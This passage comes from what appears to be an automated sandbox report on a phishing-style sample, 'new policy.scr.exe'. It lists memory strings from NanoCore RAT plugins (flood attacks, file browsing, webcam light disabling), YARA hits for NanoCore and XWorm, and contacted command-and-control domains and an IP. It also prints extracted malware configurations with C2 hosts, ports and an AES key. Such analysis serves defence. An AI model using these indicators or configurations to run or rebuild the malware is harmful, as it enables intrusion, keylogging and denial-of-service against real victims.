onfigurationSystem.GlobalizationSystem.ReflectionUnicastIPAddressInformationCollectionIClientNameObject
Source: new policy.scr.exe, 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: new policy.scr.exe, 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: new policy.scr.exe, 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: Networks!.exe, 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: Networks!.exe, 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHost

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: airlineagancy.casacam.net 7076.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
78.159.112.29	jacksonnnn233.theworkpc.com	Germany		28753	LEASEWEB-DE-FRA-10DE	true

Contacted Domains

Name	IP	Active
jacksonnnn233.theworkpc.com	78.159.112.29	true
airlineagancy.casacam.net	78.159.112.29	true
56.126.166.20.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
	true		unknown
jacksonnnn233.theworkpc.com	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
airlineagancy.casacam.net	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: new policy.scr.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Avira: detection malicious, Label: HEUR/AGEN.1323683

Found malware configuration

Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "7065c9a5-e7ef-4b4a-9ad2-3b36dc82", "Group": "JksonN", "Domain1": "jacksonnnn233.theworkpc.com", "Domain2": "", "Port": 65535, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["airlineagancy.casacam.net"], "Port": "7076", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Networks!.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Virustotal: Detection: 56%			Perma Link

Multi AV Scanner detection for submitted file

Source: new policy.scr.exe	ReversingLabs: Detection: 55%
Source: new policy.scr.exe	Virustotal: Detection: 56%			Perma Link

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
